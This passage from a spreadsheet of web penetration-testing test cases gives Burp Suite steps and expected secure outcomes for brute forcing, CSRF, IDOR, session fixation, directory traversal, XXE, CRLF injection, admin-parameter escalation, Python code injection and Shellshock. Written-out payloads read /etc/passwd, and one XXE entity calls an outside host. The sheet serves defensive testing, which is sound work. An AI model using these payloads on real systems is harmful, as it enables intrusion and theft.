3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the website and now click on submit and intercept the request-&gt;Right click on intercepted request to send it to Intruder
4.Go to Intruder tab-&gt;Then click on Positions-&gt;click on Clear$-&gt; Then select the incorrect password and click on Add button
5. Go to Payloads tab-&gt; Select Payload type as "Numbers" -&gt; Under Payloads Options provide the range From = 1 To = 100 and Step = 1
6. Click on "Start attack" button.
7. Go to the website again and try logging in with correct username and password. </t>
  </si>
  <si>
    <t>User should be able to login into his account after 24 hours</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_17</t>
  </si>
  <si>
    <t>Verify if there is a limit of recieving emails when user forgot his password</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1. Open the browser and go to the website(Ex: any.com)
2. Click on Sign in and enter username only
3. Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on "Forgot password link" and intercept the request-&gt;Right click on intercepted request to send it to Intruder
4. Go to Intruder tab-&gt;Then click on Positions-&gt;click on Clear$-&gt; Then select the "email id" and click on Add button
5. Go to Payloads tab-&gt; Select Payload type as "Numbers" -&gt; Under Payloads Options provide the range From = 1 To = 100 and Step = 1
6. Click on "Start attack" button.
7. Go to the email ( provided while signing in) and check the number of emails recieved to reset the password </t>
  </si>
  <si>
    <t>User should not recieve more than 10 emails.</t>
  </si>
  <si>
    <t>Verify if there is a limit of recieving OTP's when user forgot his password</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2. Click on Sign in and enter Phone number only
3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on "Forgot password link" and intercept the request-&gt;Right click on intercepted request to send it to Intruder
4.Go to Intruder tab-&gt;Then click on Positions-&gt;click on Clear$-&gt; Then select the Phone number and click on Add button
5. Go to Payloads tab-&gt; Select Payload type as "Numbers" -&gt; Under Payloads Options provide the range From = 1 To = 100 and Step = 1
6. Click on "Start attack" button.
7. Check the phone ( provided while signing in) and check the number of OTP's recieved to reset the password </t>
  </si>
  <si>
    <t>User should not recieve more than 10 OTP's.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_18</t>
  </si>
  <si>
    <t>CSRF on logout page</t>
  </si>
  <si>
    <t>Verify if a user gets logged out using csrf</t>
  </si>
  <si>
    <t>1. Open the browser and go to the web site(Ex: any.com)
2. Click on register and create two accounts(test@gmail.com and evil@gmail.com)
3. Login with test account in one browser(firefox) and then login with another account(evil) in another browser (chrome)
4. Open burp and start intercepting the request-&gt;Go to firefox with (test) account open, logout and capture the same request in burp-&gt; right click on intercepted request and select "generate csrf poc"-&gt; click the copy button-&gt; open a notepad and paste the copied csrf poc-&gt; save the file with extension as .html (csrf.html)
5. Go to chrome with another account(evil) and drag the csrf.html file on the webpage and click the submit button</t>
  </si>
  <si>
    <t>User should not get logged out</t>
  </si>
  <si>
    <t>CSRF on critical business logic page</t>
  </si>
  <si>
    <t>Verify if changes done in one user account gets reflected in another user's account using csrf attack</t>
  </si>
  <si>
    <t>Suppose we have a website where user can change the language(English, French, Spanish, Chinese) with default language being english
1. Open the browser and go to the web site(Ex: any.com)
2. Click on register and create two accounts(test@gmail.com and evil@gmail.com)
3. Login with test account in one browser(firefox) and then login with another account(evil) in another browser (chrome)
4. Open burp and start intercepting the request-&gt;Go to firefox with (test) account open and change the language of website to French and capture the same request in burp-&gt; right click on intercepted request and select "generate csrf poc"-&gt; click the copy button-&gt; open a notepad and paste the copied csrf poc-&gt; save the file with extension as .html (csrf.html)
5. Go to chrome with another account(evil) and drag and the csrf.html file on the webpage and click the submit button</t>
  </si>
  <si>
    <t>Changes made in one user account should not get reflected in another user's account</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_19</t>
  </si>
  <si>
    <t>Verify if an attacker is able to takover a subdomain by registering or signing up</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open kali linux-&gt; start the terminal and use the tool "Hostile subbrute forcer"
2.Use cd command in terminal to go inside "Hostile subbrute forcer" folder and input the command-&gt;
ruby sub_brute.rb --fast
3.Enter the domain you want to get subdomains of e.g any.com or google.com
4. If you get a subdomain with an error like "subdomain pointing to a non existing subdomain indicating there isn't a site"-&gt; copy those subdomains-&gt; and open in a browser-&gt;unless you get a subdomain where you can sign up and register -&gt; 
5. Claim the subdomain once you find a register or sign up button on it and register with your name
NOTE:- You can use takeover tool to get list of subdomains which can be takeovered
</t>
  </si>
  <si>
    <t>Attacker should not be able to takover a subdomain</t>
  </si>
  <si>
    <t>Broken Access Control on profile page</t>
  </si>
  <si>
    <t>Verify if user can access unauthorised data account through brutforcing ids</t>
  </si>
  <si>
    <t>Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1. Open Burp suite
2. Open the browser and got to the website to attack
3. Login as the user
4. Go to the profile page and click on view profile option
5. Verify the response and check if the user id is displayed is present in the URL. (Ex: http://www.test.com/profile/"userid". If the user id is a number like 233456, then brutforce it using the BurpSuite Inturder functionality)
6. Send the request to Intruder and click on request. Add payload into the userid section and click on number pattern and payload and give range of about 50 users (In this example it would be 233426 to 233486)
7. Now click on start attack and check if user gets any 200 OK response for any of the user id bruteforced</t>
  </si>
  <si>
    <t>User shouldn't get 200 OK message and user shouldn't be able to access other profiles just by entering the user id</t>
  </si>
  <si>
    <t>Broken Access Control testing by trying to find out hidden pages using DIRB</t>
  </si>
  <si>
    <t>Verify if the user is able to access some hidden pages or URLs using DIRB that he or she is not authorised to access</t>
  </si>
  <si>
    <t>Pre-Condition: The kali linux should be installed in the Virtual Box
1. Open Kali Linux and launch the command prompt
2. Enter the command dirb "Application base URL" /usr/share/dirb/wordlists/common.txt to see the result on the prompt or enter dirb "Application URL" -o "Path and file name of where you want to save the file (Ex: /usr/bin/output.txt)" and this will copy the output in the path entered by you
3. Now hit enter and it will start scanning
4. Once the scanning is done, check the output.txt file and check if you have got any URLs with 200 OK response or any directrory files URLs you can get
5. Check if there is any sensitive data present in the URLs or folders</t>
  </si>
  <si>
    <t>User should not be able to access unauthorised or sensitive data through the URLs</t>
  </si>
  <si>
    <t>Directory Traversal/Session Fixation</t>
  </si>
  <si>
    <t>Session Fixation using cookies without login on first browser</t>
  </si>
  <si>
    <t>Verify if first user is able to login when second user uses his cookie and logged in.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Intercept the request in burp before login into the portal and copy the cookie.
3. Open firefox again incognito mode and launch the same url.
4. Intercept the request and replace the cookie with the previously copied cookie and login.
5. Go to the first browser and refresh the page.
</t>
  </si>
  <si>
    <t>User should not be able to login on the first browser, if he does then there is a session fixation.</t>
  </si>
  <si>
    <t>Session fixation using cookies with login</t>
  </si>
  <si>
    <t>Verify if second user is able to login using cookies of first user's browser</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Login onto the portal and Intercept the request in burp and copy the cookie.
3. Open firefox again incognito mode and launch the same url.
4. Intercept the request and replace the cookie with the previously copied cookie.
5. Go to the second browser and refresh the page.
</t>
  </si>
  <si>
    <t>User should not be able to login on the second browser, if he does then there is a session fixation.</t>
  </si>
  <si>
    <t xml:space="preserve">Session fixation after logout  </t>
  </si>
  <si>
    <t xml:space="preserve">Verify if second user is able to login using cookies of first user's browser after logging out </t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Login onto the portal and Intercept the request in burp and copy the cookie and logout from thr portal.
3. Open firefox again incognito mode and launch the same url.
4. Intercept the request and replace the cookie with the previously copied cookie.
5. Go to the second browser and refresh the page.
</t>
  </si>
  <si>
    <t>Session Fixation for logout functionality</t>
  </si>
  <si>
    <t>Verify if user is able to login back without any error.</t>
  </si>
  <si>
    <t xml:space="preserve">1. Open the firefox browser and launch the url.
2. Login and do some activity like click on update and capture that request in Burp.
3. Then logout from the website.
4. In Burp, send that request to Intruder 
5. Set to Number list and set payload from 1 to 1000 and start attack.
6. Go to the browser again and login.
</t>
  </si>
  <si>
    <t>User should be able to login again with out any error, if not then there is session fixation.</t>
  </si>
  <si>
    <t>Verify if user can traverse through the directories.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to repeater.
3. Traverse the directories by adding ..%252f-&gt; click on Go  and then again ..%252f-&gt; click on Go  and then again ..%252f/etc /passwd and keep traversing for atleast 10 directories back 
Verify if user is able to see any critical files while traversing.
like below example:
And here request to view directory traversal
GET /static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: any.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d34587d94eba9413080d1f7aca5062a871522817854
Connection: close
Upgrade-Insecure-Requests: 1
</t>
  </si>
  <si>
    <t>Broken Authentication/
Session management</t>
  </si>
  <si>
    <t>Login using cookies</t>
  </si>
  <si>
    <t>Verify if user can login into his account using cookies</t>
  </si>
  <si>
    <t xml:space="preserve">1. Open the firefox browser and launch the url.
2. Login and capture that request in Burp.
3. Refresh Current Page &amp; Copy Cookies By Burp Proxy
4. Send Cookie Request to Repeater
5. Now, Delete Browsers Cookies Data and Logout
6. Go to the URL Again with New Private Window Of Chrome
5. Refresh the Page that says please log in to continue
6. Now, Paste That Our Old Cookies &amp; Forward Request
</t>
  </si>
  <si>
    <t>User should not be able to logged into old account &amp; able to edit username/mail/password or other info.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to work with Chrome, IE and Safari to identify the same issue. </t>
  </si>
  <si>
    <t>Not working
with Chrome as mentioned in test case</t>
  </si>
  <si>
    <t xml:space="preserve">Cryptographic vulnerability </t>
  </si>
  <si>
    <t>Verify if site is fully protected by an SSL certificate.</t>
  </si>
  <si>
    <t xml:space="preserve">1. Open the firefox browser and launch the url.
2. Set up the wireshark.
3. Verify the packets received in wireshark, if any sensitive information is being displayed in clear text like username and password.
</t>
  </si>
  <si>
    <t>Sensitive information should not be displayed in clear text like username and password.</t>
  </si>
  <si>
    <t>Sensitive information after scanning</t>
  </si>
  <si>
    <t>Verify if user is able to see any sensitive information including SSH keys, credit card numbers and email addresses, etc.after scanning.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Login onto the portal and Intercept the request in burp.
3. Go to Burp suite , Right click on the request and "Send to spider"
4. Go to Target tab and right click on the url and select "Actively scan this host"
5. Verify on the right side under Issues if any sensitive information like SSH keys, credit card numbers and email addresses, etc are being displayed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Any sensitive information should not be displayed </t>
  </si>
  <si>
    <t xml:space="preserve">Sensitive information in the Repositories  like .git/ , .svn/ , ./hg , .gitignore/ 
</t>
  </si>
  <si>
    <t>Verify if user is able to find the sensitive data in the repositories  like .git/ , .svn/ , ./hg , .gitignore/ using burp</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Login onto the portal and Intercept the request in burp.
3. Go to Burp suite , Right click on the request and "Send to spider"
4. Go to Target tab and "spider this host" 
5. Select the Url and Send  to Repeater
6. Search for .git/ , .svn/ , ./hg , .gitignore/ one by one using search options in Burp.
</t>
  </si>
  <si>
    <t>Spider Function of the Burpsuite is not exist in New Burpsuite Version. 
https://portswigger.net/blog/burp-2-0-where-are-the-spider-and-scanner</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t>XML Parser should be properly crafted</t>
  </si>
  <si>
    <t xml:space="preserve">1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3.Replace input parameters with your own xml tags like the examples shown below:-
&lt;course&gt;pentest&lt;/course&gt;
&lt;foo&gt;hacked&lt;/foo&gt;
4. Verify if,in the burp response, tag contents are being displayed ("pentest" or "hacked")
</t>
  </si>
  <si>
    <t xml:space="preserve">If the burp response reflects the tag contents then:-
1. Right click-&gt; send it to Intruder-&gt; then go to intruder tab on burp-&gt; go to "Positions"-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting the payload output by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.
</t>
  </si>
  <si>
    <t>XXE on sitemap.xml</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t>1. Click on burp "search" button -&gt; search for "sitemap.xml" -&gt; if you are able to find the request -&gt; right click
-&gt; show response in browser -&gt;  If provided, the sitemap.xml file will be downloaded and processed by a Java XML processor
The Java xml processor used is vulnerable to XXE attacks. By providing an external document type declaration (DTD) the XML processor can be coerced into processing external entities, for example:</t>
  </si>
  <si>
    <t>sitemap.xml
&lt;?xml version="1.0" encoding="utf-8"?&gt;
 &lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;
      &lt;!ENTITY % goodies SYSTEM "file:///etc/hostname"&gt;
   &lt;!ENTITY xxe SYSTEM "http://xxe.webhooks.pw/text.txt" &gt;]&gt;
&lt;urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" 
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"&gt;
    &lt;url&gt;
        &lt;loc&gt;&amp;xxe;&lt;/loc&gt;
        &lt;lastmod&gt;2006-11-18&lt;/lastmod&gt;
        &lt;changefreq&gt;daily&lt;/changefreq&gt;
        &lt;priority&gt;0.8&lt;/priority&gt;
    &lt;/url&gt;
&lt;/urlset&gt;
This issue could be abused to identify and list the contents of sensitive files on the server which implements the Site Audit functionality.</t>
  </si>
  <si>
    <t>Post Based XXE</t>
  </si>
  <si>
    <t>1. Click on burp "search" button -&gt; search for "POST" request with xml data as shown below:-
POST /api/sxmp/1.0 HTTP/1.1
Host: sms-be-vip.twitter.com
Connection: close
Content-Type: text/xml
Content-Length: 481
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;
]&gt;
&lt;operation type="deliver"&gt;
&lt;account username="abc" password="a"/&gt;
&lt;deliverRequest referenceId="MYREF102020022"&gt;
&lt;operatorId&gt;&amp;file;&lt;/operatorId&gt;
&lt;sourceAddress type="network"&gt;40404&lt;/sourceAddress&gt;
&lt;destinationAddress type="international"&gt;123&lt;/destinationAddress&gt;
&lt;text encoding="ISO-8859-1"&gt;a&lt;/text&gt;
&lt;/deliverRequest&gt;
&lt;/operation&gt;
&lt;/code&gt;</t>
  </si>
  <si>
    <t>Modify the above request with "System" keyword to verify if the web app parsers the xml request:-
POST /api/sxmp/1.0 HTTP/1.1
Host: sms-be-vip.twitter.com
Connection: close
Content-Type: text/xml
Content-Length: 481
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;
   &lt;!ENTITY file SYSTEM "file:///etc/passwd"&gt; 
]&gt;
&lt;operation type="deliver"&gt;
&lt;account username="abc" password="a"/&gt;
&lt;deliverRequest referenceId="MYREF102020022"&gt;
&lt;operatorId&gt;&amp;file;&lt;/operatorId&gt;
&lt;sourceAddress type="network"&gt;40404&lt;/sourceAddress&gt;
&lt;destinationAddress type="international"&gt;123&lt;/destinationAddress&gt;
&lt;text encoding="ISO-8859-1"&gt;a&lt;/text&gt;
&lt;/deliverRequest&gt;
&lt;/operation&gt;
&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> CRLF injection</t>
  </si>
  <si>
    <t>CRLF- Cookie in the request</t>
  </si>
  <si>
    <t>Verify if  user is able to set cookie in the request.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to repeater.
3. Go to repeater -&gt; set the below cookie in the first line after GET / under request 
__session_start__/%0aSet-Cookie:malicious_cookie1
and check if the cookie is reflected in the response.If it is reflecting then there is a vulnerability.
</t>
  </si>
  <si>
    <t>User defined Cookie should not be reflected in the response</t>
  </si>
  <si>
    <t>CRLF- Cookie in the request parameter like URL=</t>
  </si>
  <si>
    <t>Verify if user is able to set cookie in the parameters</t>
  </si>
  <si>
    <t>1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider.
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this host
4. Sort the URL's by clicking on the parameter and select a URL having parameter.
5. Right click and send the URL to repeater.
3. Go to repeater -&gt; set the below Payloads one by one in the parameters like URL= etc,   under request 
Payloads for parameters.
1. SomeCustomInjectedHeader:injected_by_User
2.%0aSet-Cookie:CRLF=INJECTION;domain=gm.com
3.?name=User%0d%0a%0d%0a&lt;script&gt;alert(document.domain)&lt;/script&gt;
4. /%0D%0ASet-Cookie%3A%20HackedCookie=Hackedby_User</t>
  </si>
  <si>
    <t>User defined Cookies/Payloads should not be reflected in the response.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_26</t>
  </si>
  <si>
    <t xml:space="preserve">
1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser click on login and intercept the request(username and password field names should be captured)
3. Remove username and password parameters( field names) and click on forward.
If there is no input validation the user can bypass the authentication and would be able to login without entering username and password.
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_27</t>
  </si>
  <si>
    <t>Login as admin by adding extra parameter</t>
  </si>
  <si>
    <t>Verify if user can login as admin by adding 'Admin' parameter.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser login with valid credentials and intercept the request.
3.Copy the username and password with there values.
for eg. 
user%5Busername%5D=user2&amp;user%5Bpassword%5D=plop&amp;submit=Submit
 4. Go to Decoder-&gt; paste the copied credentials-&gt; click on decode as...and select URL option
Result would be displayed as below
for eg. 
user[username]=user2&amp;user[password]=plop&amp;submit=Submit
5. Add extra parameter of admin at the end of above user parameter's   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> "&amp;user[admin]=true"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">for eg. 
  user[username]=user2&amp;user[password]=plop&amp;submit=Submit&amp;user[admin]=true
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Note : If true does not work try changing it to 1 like 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> "&amp;user[admin]=1"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">6. Click on forward and 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Verify if user can login as admin by adding 'Admin' parameter.
</t>
    </r>
  </si>
  <si>
    <t>User should not be able to login as Admin by adding extra 'Admin' parameter.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_28</t>
  </si>
  <si>
    <t>Code Execution using OS libraries in URL.</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands using OS libraries in URL.</t>
  </si>
  <si>
    <t>4. Now we can provide some data in the fixed url and see how it is reflecting , so that we will get to know if this is in python  or ruby and based on that we can create our payloads.
 for eg. ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2b"test"%2b" to concatinate (here %2b is url encoded value of + )
Note: we can not concatinate numbers directly.
If it is in ruby we use -&gt; 1.to_s  for concatination
eg. ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2b1.to_s%2b"
In python we use str(1) for concatination of numbers.
for eg. http://ptl-43192478-85f0785c.libcurl.st/hello/hacker"%2bstr(1)%2b"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">5. Then try replacing the test with  numbers for eg. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"+1+1+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
if we get error we can try executing the code on python IDE.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">like "hacker"+1+1+"" -&gt; 
"hacker"+str(1+1)+""
eg.
http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker%22+str(1+1)+%22
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">6. Then we can try executing  system command like :  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"+str(os.system('id'))+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">eg. http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker"+str(os.system('id'))+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
If we get an error again, execute os.system('id') on python IDE
will get to know about importing os libraries, which we can not do it on url . So in order to bypass that we use 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">__import__('os').system('id')
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">eg.http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker"+str(__import__('os').system('id'))+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker"+str(__import__('os').popen('id').read())+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker"+str(__import__('os').popen('uname -a').read())+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://ptl-9e242ba3-63fa37c9.libcurl.st/hello/hacker"+str(__import__('os').popen('cat /etc/passwd').read())+"
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
User should not be able to see any critical information .</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_29</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this </t>
  </si>
  <si>
    <t xml:space="preserve">Now goto search tab-&gt; select in scope only-&gt; select request headers and remove the check mark for the other fields -&gt; search for parameters like height, width, paramheight, paramwidth etc
If you see any request with parameters,-&gt; right click send to repeater-&gt; change the value of the parametersNow verify if you are able to see the changes refelcted on the webpage after changing the values of "width" and "height"
</t>
  </si>
  <si>
    <t>GET /anysite/iframei.php?ParamUrl=robots.txt&amp;ParamWidth=250&amp;ParamHeight=250 HTTP/1.1
Host: any.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: security_level=0; PHPSESSID=af98e60bda1249a2e9bcbf292f1a5725
Upgrade-Insecure-Requests: 1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_30</t>
  </si>
  <si>
    <t>Shellshock Bash RCE</t>
  </si>
  <si>
    <t>Verify if a website is vulnerable to Shellshock via cgi(Common Gateway interface)</t>
  </si>
  <si>
    <t>1. When exploiting shellshock, we need to target a cgi, because the issue is not inside webserver but inside bash
2. Reload the webpage and intercept-&gt; send to spider-&gt; go to search-&gt; select in scope only-&gt; select request headers and remove the check mark for the other fields and search for cgi-&gt; if found send to repeater
To test for shellshock use User-Agent header in request, because user agent will be logged inside webserver log
3. Now put the below payload in user-agent field as it is logged inside webserver logs
() { :;}; echo $(&lt;/etc/passwd)</t>
  </si>
  <si>
    <t>GET /cgi-bin/status HTTP/1.1
Host: ptl-1ae41e73-02e8d44f.libcurl.so
